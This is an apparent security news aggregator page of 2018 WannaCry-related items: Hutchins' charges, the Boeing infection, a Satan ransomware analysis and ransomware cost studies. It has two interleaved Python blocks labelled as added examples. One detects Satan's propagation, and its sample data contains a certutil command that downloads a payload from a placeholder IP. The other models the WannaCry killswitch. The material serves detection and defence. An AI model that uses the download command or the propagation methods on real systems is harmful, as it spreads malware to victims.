What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
MalwarebytesLabs.webp 2018-06-11 16:02:01 (Déjà vu) A week in security (June 4 – June 10) (direct link) A roundup of the security news from June 4 – June 10, including IoT botnets, government attacks, dodgy Wi-Fi, and more. Categories: Security world Week in security Tags: (Read more...) Wannacry
DarkReading.webp 2018-06-07 17:20:00 FBI Slaps New Charges Against Researcher Who Stopped WannaCry (direct link) Federal authorities charged Marcus Hutchins with lying to the government and authoring a second piece of malware in addition to the Kronos banking Trojan. Wannacry
The_Hackers_News.webp 2018-06-07 05:38:01 Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI (direct link) Marcus Hutchins, the British malware analyst who helped stop the global WannaCry menace, is now facing four new charges related to malware he allegedly created and promoted online to steal financial information. Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role Wannacry
bleepingcomputer.webp 2018-06-06 20:00:00 US Piles New Charges on Marcus Hutchins (aka MalwareTech) (direct link) The US government has filed new charges against Marcus Hutchins, the security researcher known as MalwareTech who stopped the WannaCry ransomware outbreak last year. [...] Wannacry
Checkpoint.webp 2018-06-05 13:00:02 Healthcare, Retail, and Finance: Gen V Attacks Affect All Industries (direct link) Fifth generation mega-attacks have changed the cyber security landscape forever. As proven by the WannaCry and Petya ransomware attacks last year, using vulnerabilities and exploit tools stolen from intelligence agencies, attackers can now cause economic chaos across all industries around the world. From finance to healthcare to manufacturing, almost all organizations across all industries […] Wannacry
AlienVault.webp 2018-06-01 15:00:00 Satan Ransomware Spawns New Methods to Spread (direct link) Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems. BleepingComputer first reported on Satan ransomware in January 2017. Recently, Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments (BartBlaze's blog). This is the same exploit associated with a previous WannaCry Ransomware campaign. While Microsoft patched the vulnerability associated with EternalBlue in March 2017, many environments remain vulnerable. Unusually, we've identified samples of Satan Ransomware that not only include EternalBlue, but also a far larger set of propagation methods. This Satan variant attempts to propagate through: JBoss (CVE-2017-12149); WebLogic (CVE-2017-10271); the EternalBlue exploit (CVE-2017-0143); and Tomcat web application brute forcing. Malware Analysis: Below is a sample from early May 2018 of Satan Ransomware using all the previously mentioned techniques, which we are going to analyze. Name: sts.exe File size: 1.7 Mb MD5: c290cd24892905fbcf3cb39929de19a5 The first thing we see in the analyzed sample is that the malware was packed with the MPRESS packer. The main goal of this sample is to drop Satan Ransomware, encrypt the victim's host, and then request a Bitcoin payment. Afterwards, the sample will also try to spread in the network using exploits such as EternalBlue. EternalBlue: The malware drops several EternalBlue files in the victim's host. These files are a public version of the exploit without any modifications or custom implementations. All are dropped in the folder C:\Users\All Users\ in the infected system. Sts.exe initiates the process of spreading across the network by scanning all the systems within the same network segment. Through the following command line, systems vulnerable to the SMB EternalBlue exploit will execute the previously dropped library down64.dll.
The down64.dll attempts to load code in the target's memory, and then downloads sts.exe using the legitimate Microsoft certutil.exe tool. This is a known download technique described as Remote File Copy - T1105 in MITRE ATT&CK. So Many Exploits: The sample uses some other network activity to continue to spread across the network. A compromised system will make an HTTP PUT request to /Clist1.jsp to execute a jsp file that downloads another sample of sts.exe on the target server. Another interesting technique used to infect other systems is the ability to identify an Apache Tomcat server and bruteforce it. It make Ransomware Wannacry
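The three propagation behaviours the Satan write-up above describes (a download through certutil.exe, an HTTP PUT of a .jsp, and brute forcing of a Tomcat server) each leave a distinctive trace that a SOC can alert on. The following Python is added here as an example and is not code from AlienVault or from the original page. It runs one check per behaviour over constructed sample telemetry: the hostnames, IP addresses, log lines, certutil command-line switches and the /manager/html path used for the Tomcat manager are assumptions for illustration; only /Clist1.jsp, down64.dll and sts.exe come from the write-up.

```python
import re
from collections import Counter

# Constructed sample process-creation telemetry, not data from the Satan sample.
# Shape: (host, parent image, command line).
PROCESS_EVENTS = [
    ("ws01", r"C:\Users\All Users\down64.dll",
     r"certutil.exe -urlcache -split -f http://203.0.113.10/sts.exe C:\Users\All Users\sts.exe"),
    ("ws02", r"C:\Windows\System32\svchost.exe",
     r"certutil.exe -verify signed.cer"),          # legitimate certutil use, must not alert
    ("ws03", r"C:\Windows\System32\cmd.exe",
     r"certutil -urlcache -f http://203.0.113.10/sts.exe sts.exe"),
]

# Constructed web server access log in Common Log Format (not real traffic).
HTTP_LOG = [
    '10.0.0.5 - - [01/May/2018:10:00:01 +0000] "PUT /Clist1.jsp HTTP/1.1" 201 0',
    '10.0.0.5 - - [01/May/2018:10:00:02 +0000] "GET /Clist1.jsp HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/May/2018:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
] + [
    # Eight consecutive authentication failures against the Tomcat manager from one source.
    f'10.0.0.7 - - [01/May/2018:10:02:{i:02d} +0000] "GET /manager/html HTTP/1.1" 401 0'
    for i in range(8)
] + [
    # A single failure from another source: below any sensible threshold.
    '10.0.0.9 - - [01/May/2018:10:03:00 +0000] "GET /manager/html HTTP/1.1" 401 0',
]

# certutil used as a downloader: -urlcache together with a URL on the command line.
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*\bhttps?://", re.I)
# Common Log Format: source, method, path and status code.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def detect_certutil_download(events):
    """Remote File Copy (ATT&CK T1105) via certutil: returns (host, command line) hits."""
    return [(host, cmd) for host, _parent, cmd in events if CERTUTIL_DOWNLOAD.search(cmd)]


def detect_jsp_upload(lines):
    """HTTP PUT of a .jsp resource (Satan PUTs /Clist1.jsp): returns (source, path, status)."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m and m.group(2) == "PUT" and m.group(3).lower().endswith(".jsp"):
            hits.append((m.group(1), m.group(3), int(m.group(4))))
    return hits


def detect_manager_bruteforce(lines, path="/manager/html", threshold=5):
    """Repeated 401s against the Tomcat manager from one source: returns {source: failures}."""
    failures = Counter()
    for line in lines:
        m = CLF.match(line)
        if m and m.group(3).startswith(path) and m.group(4) == "401":
            failures[m.group(1)] += 1
    return {src: n for src, n in failures.items() if n >= threshold}


def run_all(events=PROCESS_EVENTS, lines=HTTP_LOG):
    """Collect all findings in one structure so they can be checked or forwarded."""
    return {
        "certutil_download": detect_certutil_download(events),
        "jsp_upload": detect_jsp_upload(lines),
        "manager_bruteforce": detect_manager_bruteforce(lines),
    }


if __name__ == "__main__":
    for name, findings in run_all().items():
        print(name, findings)
```

The certutil rule keys on the download switch plus a URL rather than on the binary alone, because certutil.exe is a signed Microsoft tool with plenty of legitimate uses; the brute-force rule needs a threshold and, in production, a time window, since a single 401 against the manager is normal.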
Blog.webp 2018-05-30 08:59:04 Q&A: How EventTracker breathes new life into SIEMs - by co-managing company systems (direct link) Security information and event management systems – aka SIEMs — arrived in the corporate environment some 13 years ago holding much promise. Related article: WannaCry revives self-spreading viruses SIEMs hoovered up anything that might be a security issue in real-time from various event and data sources. Companies could pump in all of the data traffic […] Wannacry
no_ico.webp 2018-05-21 13:00:02 I Still WannaCry One Year Later (direct link) The ISBuzz Post: This Post I Still WannaCry One Year Later Wannacry
DarkReading.webp 2018-05-17 19:00:00 Get Ready for 'WannaCry 2.0' (direct link) Another widespread worm attack is "inevitable," but spreading a different, more lucrative or destructive payload, experts say. Wannacry
Kaspersky.webp 2018-05-17 15:25:05 One Year After WannaCry: A Fundamentally Changed Threat Landscape (direct link) Threatpost talked to several security researchers about what's changed in the past year. Wannacry
Checkpoint.webp 2018-05-15 13:00:04 One Year Later: WannaCry, The Dawn Of A New Generation Of Cyber-Attacks (direct link) A year ago today, after multiple days of digital bombardment, the cyber-security world changed forever. Over one weekend, the notorious ransomware attack that would become widely known as WannaCry infected more than 200,000 machines around the world, causing billions of dollars in damages. Ransomware attacks occur all the time, but the speed and the […] Wannacry
ESET.webp 2018-05-14 11:57:04 WannaCryptor: The curious tale of a ravenous cryptoworm (direct link) Do you still remember how WannaCryptor ran its – winding – course? It was a tale that revealed a number of intriguing plot lines amid the ransomworm's numerous twists and turns. Wannacry
SecurityAffairs.webp 2018-05-12 13:28:04 Wannacry outbreak anniversary: the EternalBlue exploit even more popular now (direct link) WannaCry ransomware outbreak anniversary – According to researchers from ESET, the popularity of EternalBlue increased significantly over the past months. Exactly one year ago, on May 12, the WannaCry ransomware infected hundreds of thousands of computers worldwide. The success of the malware was due to its use of the EternalBlue exploit, which was stolen by Shadow Brokers […] Wannacry
no_ico.webp 2018-05-12 10:30:00 NHS WannaCry: One Year On (direct link) The ISBuzz Post: This Post NHS WannaCry: One Year On Wannacry
SecurityWeek.webp 2018-05-11 17:41:04 One Year After WannaCry Outbreak, EternalBlue Exploit Still a Threat (direct link) One year after the WannaCry ransomware outbreak, the NSA-linked exploit used for propagation is still threatening unpatched and unprotected systems, security researchers say. Wannacry
bleepingcomputer.webp 2018-05-11 14:05:01 One Year After WannaCry, EternalBlue Exploit Is Bigger Than Ever (direct link) Tomorrow, May 12, is the one-year anniversary of the WannaCry ransomware outbreak. Exactly one year after the biggest cyber-security incident in history, the exploit at the heart of the WannaCry attack is now more popular than ever, according to telemetry data gathered by Slovak antivirus vendor ESET. [...] Wannacry
ESET.webp 2018-05-11 09:59:03 12 months on, what are the lessons learned from WannaCryptor? (direct link) Time does fly! It feels like only yesterday that a new strain of hitherto little-known malware achieved celebrity status among global ransomware campaigns Wannacry
no_ico.webp 2018-05-10 23:30:03 One Year After WannaCry: What's Changed & What Hasn't? (May 12 Marks One Year) (direct link) The ISBuzz Post: This Post One Year After WannaCry: What's Changed & What Hasn't? (May 12 Marks One Year) Wannacry
ESET.webp 2018-05-10 12:57:03 One year later: EternalBlue exploit more popular now than during WannaCryptor outbreak (direct link) The infamous outbreak may no longer be causing mayhem worldwide, but the threat that enabled it is still very much alive and posing a major threat to unpatched and unprotected systems Wannacry
itsecurityguru.webp 2018-05-10 10:09:02 Half of UK Organisations Have Fallen Prey to Ransomware Attacks (direct link) A year after the WannaCry ransomware attack impacted an estimated 200,000 victims and 200,000 computers, new research from Webroot, the Smarter Cybersecurity® company, has revealed that organisations across the UK are still struggling to deal with ransomware. Webroot surveyed over 400 IT decision makers at UK businesses and found that 45 per cent of those ... Wannacry
no_ico.webp 2018-05-08 23:16:05 'More Exposed Than Ever' – Businesses Not Ready For Another WannaCry (direct link) The ISBuzz Post: This Post 'More Exposed Than Ever' – Businesses Not Ready For Another WannaCry Wannacry
securityintelligence.webp 2018-05-04 17:13:01 WannaCry Dominates Ransomware News in 2017, Drives 415 Percent Attack Boost (direct link) WannaCry drove a 415 percent increase in ransomware attacks and accounted for 90 percent of all detection reports in 2017. In addition to these eye-popping numbers, F-Secure's "The Changing State of Ransomware" report also offered some positive ransomware news: the lack of big paydays for campaigns such as WannaCry and NotPetya is now causing a […] NotPetya Wannacry
SecurityWeek.webp 2018-05-03 16:36:04 Commodity Ransomware Declines as Corporate Attacks Increase (direct link) 2017 was a landmark year for ransomware, with WannaCry and NotPetya grabbing headlines around the world. Ransomware attacks grew by more than 400% over the year, while the number of unique families and variants increased by 62%. These statistics, however, disguise an apparent change in the ransomware industry following the summer of 2017. NotPetya Wannacry
no_ico.webp 2018-04-30 13:30:05 (Déjà vu) NHS Switches To Windows 10 In The Wake Of WannaCry (direct link) The ISBuzz Post: This Post NHS Switches To Windows 10 In The Wake Of WannaCry Wannacry
bleepingcomputer.webp 2018-04-30 00:20:00 UK Health Agency Switches to Windows 10 Citing WannaCry Ransomware Outbreak (direct link) The UK Department of Health and Social Care has announced that it will transition all National Health Service (NHS) computer systems to Windows 10. [...] Wannacry
no_ico.webp 2018-04-23 14:30:03 The Next WannaCry Is Coming … Are You Ready? (direct link) The ISBuzz Post: This Post The Next WannaCry Is Coming … Are You Ready? Wannacry
ErrataRob.webp 2018-04-22 19:25:25 OMG The Stupid It Burns (direct link) This article, pointed out by @TheGrugq, is stupid enough that it's worth rebutting. "The views and opinions expressed are those of the author and not necessarily the positions of the U.S. Army, Department of Defense, or the U.S. Government." Wannacry
no_ico.webp 2018-04-18 19:30:04 NHS Criticised For Not Improving Security A Year On From WannaCry (direct link) The ISBuzz Post: This Post NHS Criticised For Not Improving Security A Year On From WannaCry Wannacry
BBC.webp 2018-04-17 22:53:02 NHS ransomware attack response criticised (direct link) MPs say it is "alarming" that plans to improve cyber-security after the Wannacry attack have not been agreed. Wannacry
SecurityWeek.webp 2018-04-13 16:10:02 Illumio, Qualys Partner on Vulnerability-based Micro-Segmentation (direct link) Vulnerability management has two major components: discovering vulnerabilities, and mitigating those vulnerabilities. The first component is pointless without the second component. So, for example, Equifax, WannaCry, NotPetya, and many other breaches -- if not most breaches -- are down to a failure to patch, which is really a failure in vulnerability management. NotPetya Wannacry Equifax
bleepingcomputer.webp 2018-04-10 08:00:00 WannaCry Ransomware Sinkhole Data Now Available to Organizations (direct link) Kryptos Logic, the cyber-security firm running the main WannaCry sinkhole, announced today plans to allow organizations access to some of the WannaCry sinkhole data. [...] Wannacry
The_Hackers_News.webp 2018-04-06 04:41:01 Microsoft Office 365 Gets Built-in Ransomware Protection and Enhanced Security Features (direct link) Ransomware has been around for a few years, but it has become an albatross around everyone's neck, targeting big businesses, hospitals, financial institutions and individuals worldwide and extorting millions of dollars. Last year, we saw some major ransomware outbreaks, including WannaCry and NotPetya, which wreaked havoc across the world, hitting hundreds of thousands of computers and NotPetya Wannacry
itsecurityguru.webp 2018-04-05 13:17:00 Pyongyang Hackers Could be Major Future Threat: Parliament (direct link) The North Korean cyber-threat to the UK remains below that of Russia and China but could increase in the future, a new parliamentary Defence Committee report has claimed. It reiterated the view that the WannaCry ransomware attack which decimated large parts of the NHS was carried out by the Kim Jong-un regime, but that the ... Wannacry
no_ico.webp 2018-04-03 12:30:03 WannaCry Ransomware (direct link) The ISBuzz Post: This Post WannaCry Ransomware Wannacry
Blog.webp 2018-04-02 21:56:03 Podcast Episode 90: WannaCry zombie haunts Boeing, UL tests for cyber security and Harvard war games election hacking (direct link) In this week's podcast, Episode #90: has the WannaCry ransomware returned from the dead? We talk with an expert from Juniper Networks about what might be behind the outbreak at Boeing. Also: Underwriters Lab and Johnson Controls join us on the podcast to talk about a recent milestone: UL's award of the first ever Level 3 certificate for... Wannacry
bleepingcomputer.webp 2018-03-30 14:50:00 The Week in Ransomware - March 30th 2018 - Mostly Small Variants (direct link) It was mostly small variants released this week. We did have a new Cryptomix variant released, a wiper called UselessDisk disguised as a ransomware, and a strange report that Boeing had been infected with WannaCry. Overall, though, it has been a slow week. [...] Wannacry
ErrataRob.webp 2018-03-29 22:25:24 WannaCry after one year (direct link) In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago. It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this from watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, has whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry. Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit). Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug an unpatched computer into the raw Internet, without the benefit of a firewall, it'll get infected within an hour. However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened?
The narrative from the news stories implies some nefarious hacker activity that "targeted" Boeing, but that's unlikely. We now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop. Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading. Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will conti Medical Wannacry APT 38
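To make the killswitch point above concrete, the following Python is added here as an example and is not part of the ErrataRob post. It models the worm's go/no-go decision across network segments. The post describes the check as a DNS lookup; the WannaCry sample actually attempted an HTTP connection to the killswitch domain, which only succeeds when the name resolves and the connection completes, so the model requires both and treats every failure (NXDOMAIN, SERVFAIL, timeout, blocked egress) as "keep spreading". The domain name, segment names and addresses are placeholders: the real killswitch domain is not named on this page.

```python
import socket
from dataclasses import dataclass, field

# Placeholder stand-in for the killswitch domain, which this page does not name.
KILLSWITCH_DOMAIN = "killswitch.example"


@dataclass
class Segment:
    """A network segment as seen by an infected host inside it (constructed model)."""
    name: str
    dns: dict = field(default_factory=dict)    # name -> IP answered by the segment's resolver
    reachable: set = field(default_factory=set)  # IPs to which an outbound TCP connect succeeds


def killswitch_trips(segment, domain=KILLSWITCH_DOMAIN):
    """True when the worm would exit: the name resolves AND the connection succeeds.

    A name that does not resolve (no upstream DNS in an isolated plant network) or
    resolves but cannot be reached (egress firewalled) leaves the worm running.
    """
    ip = segment.dns.get(domain)
    if ip is None:
        return False
    return ip in segment.reachable


def segments_still_spreading(segments):
    """Names of the segments in which an infected host would keep propagating."""
    return [s.name for s in segments if not killswitch_trips(s)]


def live_probe(domain, port=80, timeout=3.0):
    """The same decision made against the real network from the current host.

    Not exercised by the constructed model below; useful when checking whether a
    given segment would actually let the killswitch fire.
    """
    try:
        ip = socket.gethostbyname(domain)
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


# Constructed segments (placeholder names and addresses).
SEGMENTS = [
    # Corporate LAN: recursive DNS reaches the Internet and HTTP egress is allowed.
    Segment("office LAN", {KILLSWITCH_DOMAIN: "192.0.2.10"}, {"192.0.2.10"}),
    # Plant floor with no upstream resolver: the lookup fails, the worm carries on.
    Segment("plant floor, no egress"),
    # Plant floor that resolves names but has no outbound route: connect fails, worm carries on.
    Segment("plant floor, resolves but firewalled", {KILLSWITCH_DOMAIN: "192.0.2.10"}, set()),
    # Plant floor where an internal zone answers the name with a host that accepts the
    # connection: the killswitch fires even though the segment has no Internet access.
    Segment("plant floor with internal sinkhole", {KILLSWITCH_DOMAIN: "10.10.0.5"}, {"10.10.0.5"}),
]


if __name__ == "__main__":
    for seg in SEGMENTS:
        print(f"{seg.name}: worm exits = {killswitch_trips(seg)}")
    print("still spreading:", segments_still_spreading(SEGMENTS))
```

The last segment shows the mitigation the model implies for disconnected networks: answer the killswitch name internally and make the answered address reachable, rather than relying on Internet DNS that the segment will never see.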
zataz.webp 2018-03-29 20:53:04 Boeing infected by WannaCry and a fake bank hidden in an Airbus site (direct link) WannaCry turns up on machines at Boeing while a fake bank is hidden by a hacker in Airbus's official shop. There seems to be a persistent impression within companies that the WannaCry ransomware strain is no longer active. But that is not... This article, Boeing infecté par WannaCry et une fausse banque cachée dans un site Airbus, appeared first on ZATAZ. Wannacry
ESET.webp 2018-03-29 14:34:05 WannaCryptor said to reappear, hitting Boeing's computers (direct link) The notorious ransomware prompted fears that aircraft production could be impacted Wannacry
itsecurityguru.webp 2018-03-29 11:45:03 Boeing suffering from WannaCry outbreak (direct link) In a baffling turn of events, computers at Boeing have allegedly been infected with the WannaCry Ransomware. View Full Story ORIGINAL SOURCE: Bleeping Computer Wannacry
DarkReading.webp 2018-03-29 11:30:00 WannaCry Re-emerges at Boeing (direct link) Computers at the aerospace giant were hit by the WannaCry malware, but systems are back to normal Wannacry
SecurityAffairs.webp 2018-03-29 09:12:00 Boeing production plant infected with WannaCry ransomware (direct link) According to a report from the Seattle Times, the dreaded WannaCry ransomware hit a Boeing production plant in Charleston, South Carolina on Wednesday. WannaCry is back, this time it infected some systems belonging to US aircraft manufacturer Boeing. According to a report from the Seattle Times, the dreaded ransomware hit a Boeing production plant in Charleston, South Carolina on […] Wannacry
bleepingcomputer.webp 2018-03-28 19:21:03 Boeing Is Dealing With a Suspected WannaCry Ransomware Outbreak (direct link) In a baffling turn of events, computers at Boeing have allegedly been infected with the WannaCry Ransomware. According to the Seattle Times, a memo was sent out by a Boeing employee that states that systems have been affected and that there were concerns the ransomware would "spread to airplane software". [...] Wannacry
SecurityWeek.webp 2018-03-27 17:04:04 Statistics Say Don't Pay the Ransom; but Cleanup and Recovery Remains Costly (direct link) Businesses have lost faith in the ability of traditional anti-virus products to detect and prevent ransomware. Fifty-three percent of U.S. companies infected by ransomware in 2017 blamed legacy AV for failing to detect the ransomware. Ninety-six percent of those are now confident that they can prevent future attacks, and 68% say this is because they have replaced legacy AV with next-gen endpoint protection. These details come from a February 2018 survey undertaken by Vanson Bourne for SentinelOne, a next-gen provider, allowing SentinelOne to claim, "This distrust in legacy AV further confirms the required shift to next-gen endpoint protection in defending against today's most prominent information security threats." This is a fair statement, but care should be taken not to automatically confuse 'legacy AV' with all traditional suppliers -- many can also now be called next-gen providers with their own flavors of AI-assisted malware detection. SentinelOne's Global Ransomware Report 2018 (PDF) questioned 500 security and risk professionals (200 in the U.S., and 100 in each of France, Germany and the UK) employed in a range of verticals and different company sizes. The result provides evidence that paying a ransom is not necessarily a solution to ransomware. Forty-five percent of U.S. companies infected with ransomware paid at least one ransom, but only 26% had their files unlocked. Furthermore, 73% of those firms that paid the ransom were targeted at least once again. Noticeably, while defending against ransomware is a security function, responding to it is a business function: 44% of companies that paid up did so without the involvement or sanction of the IT/security teams. The attackers appear to have concluded that U.S. firms are the more likely to pay a ransom, and more likely to pay a higher ransom.
While the global average ransom is $49,060, the average paid by U.S. companies was $57,088. "If the cost of paying the ransomware is less than the lost productivity caused by downtime from the attack, they tend to pay," SentinelOne's director of product management, Migo Kedem, told SecurityWeek. "This is not good news, as it means the economics behind ransomware campaigns still make sense, so attacks will continue." This is in stark contrast to the UK, where the average payment is almost $20,000 lower at $38,500. It is tempting to wonder if this is because UK companies just don't pay ransoms. In 2016, 17% of infected UK firms paid up; now it is just 3%. This may reflect the slightly different approaches in law enforcement advice. While LEAs always say it is best not to pay, the UK's NCSC says flatly, 'do not pay', while the FBI admits that it is ultimately the decision of each company. Paying or not paying is, however, only a small part of the cost equation; and the UK's Office for National Statistics (ONS) provides useful figures. According to SentinelOne, these figures show that in a 12-month period, the average cost of a ransomware infection to a UK business was £329,976 ($466,727). With 40% of businesses with more than 1000 employees being infected, and 2,625 such organizations in the UK, the total cost of ransomware to UK business in 12 months was £346.4 m Guideline Wannacry
AlienVault.webp 2018-03-27 13:00:00 Tales from the SOC: The Simulated Attack (direct link) Introduction: In today's world, understanding threats and how to avoid them is critical to a business's success. Last year, we saw an evolution in malware and attacks. Ransomware like WannaCry made its debut, featuring worm-like attributes that allowed the ransomware to self-propagate through a network, exploiting vulnerable machines and continuing the damage. We started to see attackers using more advanced automation in their malware and shiftier distribution methods to thwart defenses. In September 2017, we saw a supply chain attack against download servers that added a Trojan within versions of the popular CCleaner PC utility software. The download was undetected for almost a month and it is estimated that over 2 million users had installed it. According to the US government, cyberattacks reportedly cost the US economy a $57-109 billion loss in 2016. Cisco reported in 2017 that 53% of cyberattacks resulted in damages of $500k or more; 8% had damage totals over $5 million per incident. While costs are skyrocketing, so is the average timeframe for detecting cyberattacks. Multiple studies over the last several years have found businesses are averaging a three to eight-month time period before even detecting a cyber-attack. We know the threat is real and the costs of a cyberattack can be exorbitant, so what can we do with all this information? As an MSSP, something we always recommend to our clients and prospects is practicing a multi-layer defense approach within their network. Multiple layers of security are an important part of detecting, preventing, and minimizing a business's exposure to a cyberattack. So many times, we have heard "I have good anti-virus and an expensive firewall; I don't need any other defenses." Unfortunately, that is no longer the case.
Preventive security is no longer enough; organizations must build a strong defense and use offensive practices to proactively head off potential intrusions. In today's blog, we share with you a real-life experience and what we did to mitigate the threat by building a strong cybersecurity strategy. Tale from Our SOC: Several years ago, we helped a client implement managed security services. The client's priorities were never focused on security, until they hired a consulting company to perform a simulated cyberattack. The exercise shed light on their security shortcomings. It highlighted how the current controls they had in place failed during the simulated attack and what methods were missing from their environment, including: incident response, security awareness and systems capable of detecting these acts. The Simulated Attack: When the simulated attack was started, the attackers used only the organization's name. The first step was reconnaissance about this organization, where common tools like Google and LinkedIn were used to search for user email formats, website, and domain information. As the discovery phase progressed, IPs for VPN server access and email servers were identified. Based on the information they discovered, user lists were built, and a phishing campaign was prepared. The attacker ran vulnerability scans and methodical brute force tests to identify any weaknesses within the external services they had already identified. The next step in the simulated attack was the phishing campaign. Now that the attacker had built a list of potential emails, they Guideline CCleaner Wannacry
SecurityWeek.webp 2018-03-26 13:19:01 (Déjà vu) Energy Sector Most Impacted by ICS Flaws, Attacks: Study (direct link) The energy sector was targeted by cyberattacks more than any other industry, and many of the vulnerabilities disclosed last year impacted products used in this sector, according to a report published on Monday by Kaspersky Lab. The security firm has analyzed a total of 322 flaws disclosed in 2017 by ICS-CERT, vendors and its own researchers, including issues related to industrial control systems (ICS) and general-purpose software and protocols used by industrial organizations. Of the total number of security holes, 178 impact control systems used in the energy sector. Critical manufacturing organizations – this includes manufacturers of primary metals, machinery, electrical equipment, and transportation equipment – were affected by 164 of these vulnerabilities. Other industries hit by a significant number of vulnerabilities are water and wastewater (97), transportation (74), commercial facilities (65), and food and agriculture (61). Many of the vulnerabilities disclosed last year impacted SCADA or HMI components (88), industrial networking devices (66), PLCs (52), and engineering software (52). However, vulnerabilities in general purpose software and protocols have also had an impact on industrial organizations, including the WPA flaws known as KRACK and bugs affecting Intel technology. As for the types of vulnerabilities, nearly a quarter are web-related and 21 percent are authentication issues. A majority of the flaws have been assigned severity ratings of medium or high, but 60 weaknesses are considered critical based on their CVSS score. Kaspersky pointed out that all vulnerabilities with a CVSS score of 10 are related to authentication and they are all easy to exploit remotely.
Kaspersky said 265 of the vulnerabilities can be exploited remotely without authentication and without any special knowledge or skills. It also noted that exploits are publicly available for 17 of the security holes. The company has also shared data on malware infections and other security incidents. In the second half of 2017, Kaspersky security products installed on industrial automation systems detected nearly 18,000 malware variants from roughly 2,400 families. Malware attacks were blocked on almost 38 percent of ICS computers protected by the company, which was slightly less than in the second half of the previous year. Again, the energy sector was the most impacted. According to the security firm, roughly 40 percent of the devices housed by energy organizations were targeted. Guideline Wannacry
SecurityWeek.webp 2018-03-23 19:45:03 (Déjà vu) Ransomware Hits City of Atlanta (direct link) A ransomware attack -- possibly a variant of SamSam -- has affected some customer-facing applications and some internal services at the City of Atlanta. The FBI and incident response teams from Microsoft and Cisco are investigating. The city's police department, water services and airport are not affected. The attack was detected early on Thursday morning. By mid-day the city had posted an outage alert to Twitter. In a press conference held Thursday afternoon, mayor Keisha Bottoms announced that the breach had been ransomware. She gave no details of the ransomware demands, but noticeably declined to say whether the ransom would be paid or refused. Bottoms could not at this stage confirm whether personal details had also been stolen in the same breach, but suggested that customers and staff should monitor their credit accounts. Questions on the viability of data backups and the state of system patches were not clearly answered; but it was stressed that the city had adopted a 'cloud first' policy going forwards specifically to improve security and mitigate against future ransomware attacks. A city employee obtained and sent a screenshot of the ransom note to local station 11Alive. The screenshot shows a bitcoin demand for $6,800 per system, or $51,000 to unlock all systems. It is suggested that the ransom note is similar to ones used by the SamSam strain of ransomware. Steve Ragan subsequently tweeted, "1 local, 2 remote sources are telling me City of Atlanta was hit by SamSam. The wallet where the ransom is to be sent (if they pay) has collected $590,000 since Jan 27." SamSam ransomware infected two healthcare organizations earlier this year. SamSam is not normally introduced via a phishing attack, but rather following a pre-existing breach. This could explain the concern over data theft on top of the data encryption.
It also raises the question of whether the initial breach was due to a security failure, an unpatched system, or via a third-party supplier. Ransomware is not a new threat, and there are mitigations -- but it continues to cause havoc. Official advice is, wherever at all possible, refuse to pay. The theory is that if the attackers cease getting a return on their attacks, they will turn to something easier with a better ROI on their time. This approach simply isn't working. Sometimes payment can be avoided by recovering data from backups NotPetya Wannacry
SecurityWeek.webp 2018-03-19 12:24:04 Preventing Business Email Compromise Requires a Human Touch (lien direct) Human-powered Intelligence Plays a Critical Role in Defending Against Socially Engineered Attacks The FBI's Internet Crime Complaint Center (IC3) declared Business Email Compromise (BEC) the “3.1 billion dollar scam” in 2016, an amount which then grew in the span of one year into a “5 billion dollar scam.” Trend Micro now projects those losses in excess of 9 billion dollars.  It's an understatement to say BEC scams and the resulting damages are on the rise. But with cybersecurity spending across all sectors at an all-time high, how is such an unsophisticated threat still costing otherwise well-secured organizations billions of dollars?  Unlike the numerous types of attacks that incorporate malware, most BEC scams rely solely on social engineering. In fact, its use of trickery, deception, and psychological manipulation rather than malware is largely why BEC continually inflicts such substantial damages. Since most network defense solutions are designed to detect emails containing malware and malicious links, BEC emails often land directly in users' inboxes. And when this happens, the fate of an attempted BEC scam is in the hands of its recipient. Indeed, BEC underscores 